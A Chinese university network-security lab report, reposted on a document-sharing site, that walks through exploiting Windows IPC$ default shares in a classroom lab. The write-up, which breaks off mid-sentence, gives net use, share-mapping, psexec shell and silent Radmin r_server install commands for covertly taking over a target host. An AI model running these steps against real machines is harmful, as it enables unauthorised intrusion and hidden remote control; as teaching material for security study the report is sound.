網络安全技术实验八_ip管道利用.docVIP

  1. 1、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
網络安全技术实验八_ip管道利用

沈 阳 工 程 学 院 学 生 实 验 报 告 实验室名称:信息学院网络安全实验室 实验课程名称:网络安全技术 实验项目名称:实验五 IPC$管道的利用与远程控制 班 级: 姓 名: 学 号: 实验日期: 2014 年 4 月 16 日 实验台编号:17 指导教师: 批阅教师(签字): 成绩: 实验目的 实验内容 上传恶意程序; 远程控制; 删除默认共享。 实验原理 IPC$ (Internet Process Connection) IPC$是NT/2000及之后OS的一项新功能。一些别有用心者可以利用黑客工具软件对主机进行IPC$漏洞探测。如果用户设置的口令较弱而被破解,那么通过建立IPC$连接的以下命令,攻击者就可以轻易地进入到系统中进行任意操作。 net use \\远程主机IP “密码” /user: “用户名” 与远程主机建立IPC$连接通道 net use z: \\远程主机ip\c$ 将远程主机的C盘影射为本地Z盘 copy e:\a.txt \\远程主机ip\c$ 拷贝本地文件e:\\a.txt到远程主机 net use \\远程主机ip /del 删除与远程主机的IPC$连接 实验软硬件环境 (WindowsXP)、Windows实验台 网络环境拓扑如下图所示。 如图 网络环境拓扑图 实验目标需首先确定所在实验台IP地址,并根据实验步骤填写正确的IP地址进行实验。 实验步骤 IPC$默认共享 启动实验台,以实验台为被攻击机即目标主机。主机IP如图1所示。 图1 目的主机IP地址 利用IPC$漏洞实施攻击,首先要保证被攻击机的IPC$默认共享已经打开。在Win2003操作系统中admin$,IPC$,C$默认打开,而在WinXP中根据不同版本有所不同。可用net share命令查看,如图2所示。 图2 查看共享文件 如果没有打开,可以在主机上运行命令开启,如图3所示。 图3 添加删除共享 利用以下命令与远程主机建立IPC连接 net use \\远程主机ip “密码” /user: “用户名” 与目标主机建立IPC$连接通道 net use z: \\远程主机IP\c$ 将目标主机的C盘影射为本地Z盘 copy e:\a.txt \\远程主机ip\c$ 拷贝本地文件e:\a.txt到目标主机 net use \\远程主机ip /del 删除与目标主机的IPC$连接 具体如图4、图5所示。 图4 图5 将对方的C盘映射为本地的Z盘,则可以像操纵本地硬盘一样对目标主机C盘进行操作。如图6所示。 图6 映射共享文件夹 攻击实施 现在的目标就是在对方不知道的情况下安装并运行软件。 实验工具箱中取得实验工具radmin,将其中的r_server.exe、raddrv.dll、AdmDll.dll拷贝粘贴到映射的z盘,即远程主机的C盘。 利用psexec工具获得对方的Shell,命令如下: psexec \\远程主机ip –u 用户名 –p 密码 cmd.exe; 这里的-u和-p参数分别指定远程主机的用户名和密码,cmd.exe是远程主机的命令行程序。执行成功之后就获取到了目标主机的Shell,通过下图可以看到ipconfig命令已经在远程主机上执行了,获得的是对方主机的IP地址172.20.3.17。如图7所示。 图7 查看远程IP配置 在得到的远程主机Shell上安装r_server,命令如下: C:\r_server /install /pass:密码 /port:端口 /silence。 其中密码可指定为123,此实验中没有用到。通过/port参数指定端口号,默认是4899。/silence参数表示静默安装,否则会在目标主机上出现安装的窗口,这是攻击者不希望看到的,如图8所示。 图8 安装r_server 启动r_server服务 net start r_server (注:如提示服务名称无效,则需运行两次或多次),如图9所示。 图9 启动r_server 攻击者在本地运行Radmin的客户端radmin.exe,从菜单栏选择 连接选项-连接到…,输入目标主机的IP地址和安装r_server时指定的端口号点击确定,建立一个到目标主机的连接,如图10、图11所示。 图10 图11 连接建立成功之后就可以看到目标主机的桌面,并能控制目标主机,如图12所示。可在客户端软件中选择连接模式,其中完全连接权限最

文档评论(0)

sd47f8cI + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档